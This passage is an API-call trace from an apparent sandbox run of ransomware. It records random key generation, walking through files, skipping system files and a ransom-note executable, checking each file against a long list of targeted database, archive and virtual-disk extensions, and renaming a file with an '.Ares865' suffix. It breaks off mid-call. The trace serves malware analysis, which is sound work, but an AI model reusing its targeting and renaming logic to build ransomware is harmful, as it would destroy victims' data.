dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.336] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.351] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.351] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.351] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.352] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.352] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.352] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.352] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.352] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.352] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.353] CloseHandle (hObject=0x15c) returned 1 [0085.353] CloseHandle (hObject=0x118) returned 1 [0085.353] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.353] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.353] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.353] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae607689, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae607689, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc50c9f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="aoldtz.exe") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2=".") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="..") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="windows") returned -1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="bootmgr") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="temp") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="pagefile.sys") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="boot") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="ids.txt") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="ntuser.dat") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="perflogs") returned 1 [0085.353] lstrcmpiW (lpString1="usertile40.bmp", lpString2="MSBuild") returned 1 [0085.354] lstrlenW (lpString="usertile40.bmp") returned 14 [0085.354] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 82 [0085.354] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile40.bmp" | out: lpString1="usertile40.bmp") returned="usertile40.bmp" [0085.354] lstrlenW (lpString="usertile40.bmp") returned 14 [0085.354] lstrlenW (lpString="Ares865") returned 7 [0085.354] lstrcmpiW (lpString1="e40.bmp", lpString2="Ares865") returned 1 [0085.354] lstrlenW (lpString=".dll") returned 4 [0085.354] lstrcmpiW (lpString1="usertile40.bmp", lpString2=".dll") returned 1 [0085.354] lstrlenW (lpString=".lnk") returned 4 [0085.354] lstrcmpiW (lpString1="usertile40.bmp", lpString2=".lnk") returned 1 [0085.354] lstrlenW (lpString=".ini") returned 4 [0085.354] lstrcmpiW (lpString1="usertile40.bmp", lpString2=".ini") returned 1 [0085.354] lstrlenW (lpString=".sys") returned 4 [0085.354] lstrcmpiW (lpString1="usertile40.bmp", lpString2=".sys") returned 1 [0085.354] lstrlenW (lpString="usertile40.bmp") returned 14 [0085.354] lstrlenW (lpString="bak") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.354] lstrlenW (lpString="ba_") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.354] lstrlenW (lpString="dbb") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.354] lstrlenW (lpString="vmdk") returned 4 [0085.354] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.354] lstrlenW (lpString="rar") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.354] lstrlenW (lpString="zip") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.354] lstrlenW (lpString="tgz") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.354] lstrlenW (lpString="vbox") returned 4 [0085.354] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.354] lstrlenW (lpString="vdi") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.354] lstrlenW (lpString="vhd") returned 3 [0085.354] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.354] lstrlenW (lpString="vhdx") returned 4 [0085.354] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.354] lstrlenW (lpString="avhd") returned 4 [0085.355] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.355] lstrlenW (lpString="db") returned 2 [0085.355] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.355] lstrlenW (lpString="db2") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.355] lstrlenW (lpString="db3") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.355] lstrlenW (lpString="dbf") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.355] lstrlenW (lpString="mdf") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.355] lstrlenW (lpString="mdb") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.355] lstrlenW (lpString="sql") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.355] lstrlenW (lpString="sqlite") returned 6 [0085.355] lstrcmpiW (lpString1="40.bmp", lpString2="sqlite") returned -1 [0085.355] lstrlenW (lpString="sqlite3") returned 7 [0085.355] lstrcmpiW (lpString1="e40.bmp", lpString2="sqlite3") returned -1 [0085.355] lstrlenW (lpString="sqlitedb") returned 8 [0085.355] lstrcmpiW (lpString1="le40.bmp", lpString2="sqlitedb") returned -1 [0085.355] lstrlenW (lpString="xml") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.355] lstrlenW (lpString="$er") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.355] lstrlenW (lpString="4dd") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.355] lstrlenW (lpString="4dl") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.355] lstrlenW (lpString="^^^") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.355] lstrlenW (lpString="abs") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.355] lstrlenW (lpString="abx") returned 3 [0085.355] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.355] lstrlenW (lpString="accdb") returned 5 [0085.355] lstrcmpiW (lpString1="0.bmp", lpString2="accdb") returned -1 [0085.355] lstrlenW (lpString="accdc") returned 5 [0085.356] lstrcmpiW (lpString1="0.bmp", lpString2="accdc") returned -1 [0085.356] lstrlenW (lpString="accde") returned 5 [0085.356] lstrcmpiW (lpString1="0.bmp", lpString2="accde") returned -1 [0085.356] lstrlenW (lpString="accdr") returned 5 [0085.356] lstrcmpiW (lpString1="0.bmp", lpString2="accdr") returned -1 [0085.356] lstrlenW (lpString="accdt") returned 5 [0085.356] lstrcmpiW (lpString1="0.bmp", lpString2="accdt") returned -1 [0085.356] lstrlenW (lpString="accdw") returned 5 [0085.356] lstrcmpiW (lpString1="0.bmp", lpString2="accdw") returned -1 [0085.356] lstrlenW (lpString="accft") returned 5 [0085.356] lstrcmpiW (lpString1="0.bmp", lpString2="accft") returned -1 [0085.356] lstrlenW (lpString="adb") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.356] lstrlenW (lpString="adb") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.356] lstrlenW (lpString="ade") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.356] lstrlenW (lpString="adf") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.356] lstrlenW (lpString="adn") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.356] lstrlenW (lpString="adp") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.356] lstrlenW (lpString="alf") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.356] lstrlenW (lpString="ask") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.356] lstrlenW (lpString="btr") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.356] lstrlenW (lpString="cat") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.356] lstrlenW (lpString="cdb") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.356] lstrlenW (lpString="ckp") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.356] lstrlenW (lpString="cma") returned 3 [0085.356] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.357] lstrlenW (lpString="cpd") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.357] lstrlenW (lpString="dacpac") returned 6 [0085.357] lstrcmpiW (lpString1="40.bmp", lpString2="dacpac") returned -1 [0085.357] lstrlenW (lpString="dad") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.357] lstrlenW (lpString="dadiagrams") returned 10 [0085.357] lstrcmpiW (lpString1="tile40.bmp", lpString2="dadiagrams") returned 1 [0085.357] lstrlenW (lpString="daschema") returned 8 [0085.357] lstrcmpiW (lpString1="le40.bmp", lpString2="daschema") returned 1 [0085.357] lstrlenW (lpString="db-journal") returned 10 [0085.357] lstrcmpiW (lpString1="tile40.bmp", lpString2="db-journal") returned 1 [0085.357] lstrlenW (lpString="db-shm") returned 6 [0085.357] lstrcmpiW (lpString1="40.bmp", lpString2="db-shm") returned -1 [0085.357] lstrlenW (lpString="db-wal") returned 6 [0085.357] lstrcmpiW (lpString1="40.bmp", lpString2="db-wal") returned -1 [0085.357] lstrlenW (lpString="dbc") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.357] lstrlenW (lpString="dbs") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.357] lstrlenW (lpString="dbt") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.357] lstrlenW (lpString="dbv") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.357] lstrlenW (lpString="dbx") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.357] lstrlenW (lpString="dcb") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.357] lstrlenW (lpString="dct") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.357] lstrlenW (lpString="dcx") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.357] lstrlenW (lpString="ddl") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.357] lstrlenW (lpString="dlis") returned 4 [0085.357] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.357] lstrlenW (lpString="dp1") returned 3 [0085.357] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.358] lstrlenW (lpString="dqy") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.358] lstrlenW (lpString="dsk") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.358] lstrlenW (lpString="dsn") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.358] lstrlenW (lpString="dtsx") returned 4 [0085.358] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.358] lstrlenW (lpString="dxl") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.358] lstrlenW (lpString="eco") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.358] lstrlenW (lpString="ecx") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.358] lstrlenW (lpString="edb") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.358] lstrlenW (lpString="epim") returned 4 [0085.358] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.358] lstrlenW (lpString="fcd") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.358] lstrlenW (lpString="fdb") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.358] lstrlenW (lpString="fic") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.358] lstrlenW (lpString="flexolibrary") returned 12 [0085.358] lstrcmpiW (lpString1="ertile40.bmp", lpString2="flexolibrary") returned -1 [0085.358] lstrlenW (lpString="fm5") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.358] lstrlenW (lpString="fmp") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.358] lstrlenW (lpString="fmp12") returned 5 [0085.358] lstrcmpiW (lpString1="0.bmp", lpString2="fmp12") returned -1 [0085.358] lstrlenW (lpString="fmpsl") returned 5 [0085.358] lstrcmpiW (lpString1="0.bmp", lpString2="fmpsl") returned -1 [0085.358] lstrlenW (lpString="fol") returned 3 [0085.358] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.358] lstrlenW (lpString="fp3") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.359] lstrlenW (lpString="fp4") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.359] lstrlenW (lpString="fp5") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.359] lstrlenW (lpString="fp7") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.359] lstrlenW (lpString="fpt") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.359] lstrlenW (lpString="frm") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.359] lstrlenW (lpString="gdb") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.359] lstrlenW (lpString="gdb") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.359] lstrlenW (lpString="grdb") returned 4 [0085.359] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.359] lstrlenW (lpString="gwi") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.359] lstrlenW (lpString="hdb") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.359] lstrlenW (lpString="his") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.359] lstrlenW (lpString="ib") returned 2 [0085.359] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.359] lstrlenW (lpString="idb") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.359] lstrlenW (lpString="ihx") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.359] lstrlenW (lpString="itdb") returned 4 [0085.359] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.359] lstrlenW (lpString="itw") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.359] lstrlenW (lpString="jet") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.359] lstrlenW (lpString="jtx") returned 3 [0085.359] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.359] lstrlenW (lpString="kdb") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.360] lstrlenW (lpString="kexi") returned 4 [0085.360] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.360] lstrlenW (lpString="kexic") returned 5 [0085.360] lstrcmpiW (lpString1="0.bmp", lpString2="kexic") returned -1 [0085.360] lstrlenW (lpString="kexis") returned 5 [0085.360] lstrcmpiW (lpString1="0.bmp", lpString2="kexis") returned -1 [0085.360] lstrlenW (lpString="lgc") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.360] lstrlenW (lpString="lwx") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.360] lstrlenW (lpString="maf") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.360] lstrlenW (lpString="maq") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.360] lstrlenW (lpString="mar") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.360] lstrlenW (lpString="marshal") returned 7 [0085.360] lstrcmpiW (lpString1="e40.bmp", lpString2="marshal") returned -1 [0085.360] lstrlenW (lpString="mas") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.360] lstrlenW (lpString="mav") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.360] lstrlenW (lpString="maw") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.360] lstrlenW (lpString="mdbhtml") returned 7 [0085.360] lstrcmpiW (lpString1="e40.bmp", lpString2="mdbhtml") returned -1 [0085.360] lstrlenW (lpString="mdn") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.360] lstrlenW (lpString="mdt") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.360] lstrlenW (lpString="mfd") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.360] lstrlenW (lpString="mpd") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.360] lstrlenW (lpString="mrg") returned 3 [0085.360] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.360] lstrlenW (lpString="mud") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.361] lstrlenW (lpString="mwb") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.361] lstrlenW (lpString="myd") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.361] lstrlenW (lpString="ndf") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.361] lstrlenW (lpString="nnt") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.361] lstrlenW (lpString="nrmlib") returned 6 [0085.361] lstrcmpiW (lpString1="40.bmp", lpString2="nrmlib") returned -1 [0085.361] lstrlenW (lpString="ns2") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.361] lstrlenW (lpString="ns3") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.361] lstrlenW (lpString="ns4") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.361] lstrlenW (lpString="nsf") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.361] lstrlenW (lpString="nv") returned 2 [0085.361] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.361] lstrlenW (lpString="nv2") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.361] lstrlenW (lpString="nwdb") returned 4 [0085.361] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.361] lstrlenW (lpString="nyf") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.361] lstrlenW (lpString="odb") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.361] lstrlenW (lpString="odb") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.361] lstrlenW (lpString="oqy") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.361] lstrlenW (lpString="ora") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.361] lstrlenW (lpString="orx") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.361] lstrlenW (lpString="owc") returned 3 [0085.361] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.362] lstrlenW (lpString="p96") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.362] lstrlenW (lpString="p97") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.362] lstrlenW (lpString="pan") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.362] lstrlenW (lpString="pdb") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.362] lstrlenW (lpString="pdm") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.362] lstrlenW (lpString="pnz") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.362] lstrlenW (lpString="qry") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.362] lstrlenW (lpString="qvd") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.362] lstrlenW (lpString="rbf") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.362] lstrlenW (lpString="rctd") returned 4 [0085.362] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.362] lstrlenW (lpString="rod") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.362] lstrlenW (lpString="rodx") returned 4 [0085.362] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.362] lstrlenW (lpString="rpd") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.362] lstrlenW (lpString="rsd") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.362] lstrlenW (lpString="sas7bdat") returned 8 [0085.362] lstrcmpiW (lpString1="le40.bmp", lpString2="sas7bdat") returned -1 [0085.362] lstrlenW (lpString="sbf") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.362] lstrlenW (lpString="scx") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.362] lstrlenW (lpString="sdb") returned 3 [0085.362] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.362] lstrlenW (lpString="sdc") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.363] lstrlenW (lpString="sdf") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.363] lstrlenW (lpString="sis") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.363] lstrlenW (lpString="spq") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.363] lstrlenW (lpString="te") returned 2 [0085.363] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.363] lstrlenW (lpString="teacher") returned 7 [0085.363] lstrcmpiW (lpString1="e40.bmp", lpString2="teacher") returned -1 [0085.363] lstrlenW (lpString="tmd") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.363] lstrlenW (lpString="tps") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.363] lstrlenW (lpString="trc") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.363] lstrlenW (lpString="trc") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.363] lstrlenW (lpString="trm") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.363] lstrlenW (lpString="udb") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.363] lstrlenW (lpString="udl") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.363] lstrlenW (lpString="usr") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.363] lstrlenW (lpString="v12") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.363] lstrlenW (lpString="vis") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.363] lstrlenW (lpString="vpd") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.363] lstrlenW (lpString="vvv") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.363] lstrlenW (lpString="wdb") returned 3 [0085.363] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.363] lstrlenW (lpString="wmdb") returned 4 [0085.363] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.364] lstrlenW (lpString="wrk") returned 3 [0085.364] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.364] lstrlenW (lpString="xdb") returned 3 [0085.364] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.364] lstrlenW (lpString="xld") returned 3 [0085.364] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.364] lstrlenW (lpString="xmlff") returned 5 [0085.364] lstrcmpiW (lpString1="0.bmp", lpString2="xmlff") returned -1 [0085.364] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.Ares865") returned 90 [0085.364] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default 